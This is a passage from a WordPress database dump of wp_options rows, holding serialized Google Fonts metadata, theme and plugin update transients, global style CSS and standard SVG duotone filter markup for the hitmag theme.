Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Xanh Mono\";a:3:{s:5:\"label\";s:9:\"Xanh Mono\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:17:\"Yanone Kaffeesatz\";a:3:{s:5:\"label\";s:17:\"Yanone Kaffeesatz\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Yantramanav\";a:3:{s:5:\"label\";s:11:\"Yantramanav\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Yatra One\";a:3:{s:5:\"label\";s:9:\"Yatra One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Yellowtail\";a:3:{s:5:\"label\";s:10:\"Yellowtail\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Yeon Sung\";a:3:{s:5:\"label\";s:9:\"Yeon Sung\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Yeseva One\";a:3:{s:5:\"label\";s:10:\"Yeseva One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Yesteryear\";a:3:{s:5:\"label\";s:10:\"Yesteryear\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Yomogi\";a:3:{s:5:\"label\";s:6:\"Yomogi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Yrsa\";a:3:{s:5:\"label\";s:4:\"Yrsa\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Yusei Magic\";a:3:{s:5:\"label\";s:11:\"Yusei Magic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"ZCOOL KuaiLe\";a:3:{s:5:\"label\";s:12:\"ZCOOL KuaiLe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:21:\"ZCOOL QingKe HuangYou\";a:3:{s:5:\"label\";s:21:\"ZCOOL QingKe HuangYou\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"ZCOOL XiaoWei\";a:3:{s:5:\"label\";s:13:\"ZCOOL XiaoWei\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Zen Dots\";a:3:{s:5:\"label\";s:8:\"Zen Dots\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Zen Loop\";a:3:{s:5:\"label\";s:8:\"Zen Loop\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Zen Tokyo Zoo\";a:3:{s:5:\"label\";s:13:\"Zen Tokyo Zoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Zeyada\";a:3:{s:5:\"label\";s:6:\"Zeyada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Zhi Mang Xing\";a:3:{s:5:\"label\";s:13:\"Zhi Mang Xing\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Zilla Slab\";a:3:{s:5:\"label\";s:10:\"Zilla Slab\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Zilla Slab Highlight\";a:3:{s:5:\"label\";s:20:\"Zilla Slab Highlight\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}}','no'),(515014,'_site_transient_timeout_theme_roots','1675196489','no'),(515015,'_site_transient_theme_roots','a:2:{s:6:\"hitmag\";s:7:\"/themes\";s:17:\"twentytwentythree\";s:7:\"/themes\";}','no'),(515016,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675194689;s:7:\"checked\";a:2:{s:6:\"hitmag\";s:5:\"1.3.2\";s:17:\"twentytwentythree\";s:3:\"1.0\";}s:8:\"response\";a:1:{s:6:\"hitmag\";a:6:{s:5:\"theme\";s:6:\"hitmag\";s:11:\"new_version\";s:5:\"1.3.4\";s:3:\"url\";s:36:\"https://wordpress.org/themes/hitmag/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/hitmag.1.3.4.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.3\";}}s:9:\"no_update\";a:1:{s:17:\"twentytwentythree\";a:6:{s:5:\"theme\";s:17:\"twentytwentythree\";s:11:\"new_version\";s:3:\"1.0\";s:3:\"url\";s:47:\"https://wordpress.org/themes/twentytwentythree/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/theme/twentytwentythree.1.0.zip\";s:8:\"requires\";s:3:\"6.1\";s:12:\"requires_php\";s:3:\"5.6\";}}s:12:\"translations\";a:0:{}}','no'),(515017,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675194690;s:8:\"response\";a:8:{s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:49:\"w.org/plugins/all-in-one-wp-security-and-firewall\";s:4:\"slug\";s:35:\"all-in-one-wp-security-and-firewall\";s:6:\"plugin\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:11:\"new_version\";s:5:\"5.1.4\";s:3:\"url\";s:66:\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\";s:7:\"package\";s:84:\"https://downloads.wordpress.org/plugin/all-in-one-wp-security-and-firewall.5.1.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-256x256.png?rev=2798307\";s:2:\"1x\";s:88:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/icon-128x128.png?rev=2798307\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:91:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-1544x500.png?rev=2798307\";s:2:\"1x\";s:90:\"https://ps.w.org/all-in-one-wp-security-and-firewall/assets/banner-772x250.png?rev=2798307\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:39:\"disable-gutenberg/disable-gutenberg.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/disable-gutenberg\";s:4:\"slug\";s:17:\"disable-gutenberg\";s:6:\"plugin\";s:39:\"disable-gutenberg/disable-gutenberg.php\";s:11:\"new_version\";s:5:\"2.8.1\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/disable-gutenberg/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/disable-gutenberg.2.8.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-256x256.png?rev=1925990\";s:2:\"1x\";s:70:\"https://ps.w.org/disable-gutenberg/assets/icon-128x128.png?rev=1925990\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:6:\"5.6.20\";}s:35:\"insert-headers-and-footers/ihaf.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:40:\"w.org/plugins/insert-headers-and-footers\";s:4:\"slug\";s:26:\"insert-headers-and-footers\";s:6:\"plugin\";s:35:\"insert-headers-and-footers/ihaf.php\";s:11:\"new_version\";s:5:\"2.0.6\";s:3:\"url\";s:57:\"https://wordpress.org/plugins/insert-headers-and-footers/\";s:7:\"package\";s:75:\"https://downloads.wordpress.org/plugin/insert-headers-and-footers.2.0.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-256x256.png?rev=2758516\";s:2:\"1x\";s:79:\"https://ps.w.org/insert-headers-and-footers/assets/icon-128x128.png?rev=2758516\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:82:\"https://ps.w.org/insert-headers-and-footers/assets/banner-1544x500.png?rev=2758516\";s:2:\"1x\";s:81:\"https://ps.w.org/insert-headers-and-footers/assets/banner-772x250.png?rev=2758516\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.5\";}s:27:\"redirection/redirection.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/redirection\";s:4:\"slug\";s:11:\"redirection\";s:6:\"plugin\";s:27:\"redirection/redirection.php\";s:11:\"new_version\";s:5:\"5.3.9\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/redirection/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/redirection.5.3.9.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/redirection/assets/icon-256x256.jpg?rev=983639\";s:2:\"1x\";s:63:\"https://ps.w.org/redirection/assets/icon-128x128.jpg?rev=983640\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/redirection/assets/banner-1544x500.jpg?rev=983641\";s:2:\"1x\";s:65:\"https://ps.w.org/redirection/assets/banner-772x250.jpg?rev=983642\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.6\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:23:\"wp-smushit/wp-smush.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:24:\"w.org/plugins/wp-smushit\";s:4:\"slug\";s:10:\"wp-smushit\";s:6:\"plugin\";s:23:\"wp-smushit/wp-smush.php\";s:11:\"new_version\";s:6:\"3.12.4\";s:3:\"url\";s:41:\"https://wordpress.org/plugins/wp-smushit/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/wp-smushit.3.12.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-256x256.png?rev=2746115\";s:2:\"1x\";s:63:\"https://ps.w.org/wp-smushit/assets/icon-128x128.png?rev=2746115\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/wp-smushit/assets/banner-1544x500.png?rev=2624292\";s:2:\"1x\";s:65:\"https://ps.w.org/wp-smushit/assets/banner-772x250.png?rev=2624292\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.3\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.6\";}s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:5:\"7.8.2\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/wordfence.7.8.2.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/wordfence/assets/icon-256x256.png?rev=2070855\";s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:3:\"5.3\";}s:35:\"wp-fastest-cache/wpFastestCache.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:30:\"w.org/plugins/wp-fastest-cache\";s:4:\"slug\";s:16:\"wp-fastest-cache\";s:6:\"plugin\";s:35:\"wp-fastest-cache/wpFastestCache.php\";s:11:\"new_version\";s:5:\"1.1.0\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/wp-fastest-cache/\";s:7:\"package\";s:65:\"https://downloads.wordpress.org/plugin/wp-fastest-cache.1.1.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wp-fastest-cache/assets/icon-256x256.png?rev=2064586\";s:2:\"1x\";s:69:\"https://ps.w.org/wp-fastest-cache/assets/icon-128x128.png?rev=1068904\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/wp-fastest-cache/assets/banner-772x250.jpg?rev=1064099\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";b:0;}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"20.0\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wordpress-seo.20.0.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:66:\"https://ps.w.org/wordpress-seo/assets/icon-256x256.png?rev=2643727\";s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=2643727\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=2643727\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=2643727\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=2643727\";}s:8:\"requires\";s:3:\"6.0\";s:6:\"tested\";s:5:\"6.1.1\";s:12:\"requires_php\";s:6:\"5.6.20\";}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}}s:7:\"checked\";a:10:{s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:6:\"4.4.11\";s:39:\"disable-gutenberg/disable-gutenberg.php\";s:3:\"2.6\";s:9:\"hello.php\";s:5:\"1.7.2\";s:35:\"insert-headers-and-footers/ihaf.php\";s:5:\"1.6.0\";s:27:\"redirection/redirection.php\";s:5:\"5.2.3\";s:23:\"wp-smushit/wp-smush.php\";s:5:\"3.9.5\";s:23:\"wordfence/wordfence.php\";s:5:\"7.5.9\";s:23:\"wp-cerber/wp-cerber.php\";s:5:\"8.9.6\";s:35:\"wp-fastest-cache/wpFastestCache.php\";s:5:\"1.0.0\";s:24:\"wordpress-seo/wp-seo.php\";s:6:\"18.5.1\";}}','no'),(515175,'_transient_timeout_global_styles_hitmag','1675209433','no'),(515176,'_transient_global_styles_hitmag','body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url(\'#wp-duotone-dark-grayscale\');--wp--preset--duotone--grayscale: url(\'#wp-duotone-grayscale\');--wp--preset--duotone--purple-yellow: url(\'#wp-duotone-purple-yellow\');--wp--preset--duotone--blue-red: url(\'#wp-duotone-blue-red\');--wp--preset--duotone--midnight: url(\'#wp-duotone-midnight\');--wp--preset--duotone--magenta-yellow: url(\'#wp-duotone-magenta-yellow\');--wp--preset--duotone--purple-green: url(\'#wp-duotone-purple-green\');--wp--preset--duotone--blue-orange: url(\'#wp-duotone-blue-orange\');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}','no'),(515177,'_transient_timeout_global_styles_svg_filters_hitmag','1675209433','no'),(515178,'_transient_global_styles_svg_filters_hitmag','<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-dark-grayscale\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncG type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncB type=\"table\" tableValues=\"0 0.49803921568627\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-grayscale\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0 1\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0 1\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-purple-yellow\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer color-interpolation-filters=\"sRGB\" ><feFuncR type=\"table\" tableValues=\"0.54901960784314 0.98823529411765\" /><feFuncG type=\"table\" tableValues=\"0 1\" /><feFuncB type=\"table\" tableValues=\"0.71764705882353 0.25490196078431\" /><feFuncA type=\"table\" tableValues=\"1 1\" /></feComponentTransfer><feComposite in2=\"SourceGraphic\" operator=\"in\" /></filter></defs></svg><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 0 0\" width=\"0\" height=\"0\" focusable=\"false\" role=\"none\" style=\"visibility: hidden; position: absolute; left: -9999px; overflow: hidden;\" ><defs><filter id=\"wp-duotone-blue-red\"><feColorMatrix color-interpolation-filters=\"sRGB\" type=\"matrix\" values=\" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 \" /><feComponentTransfer 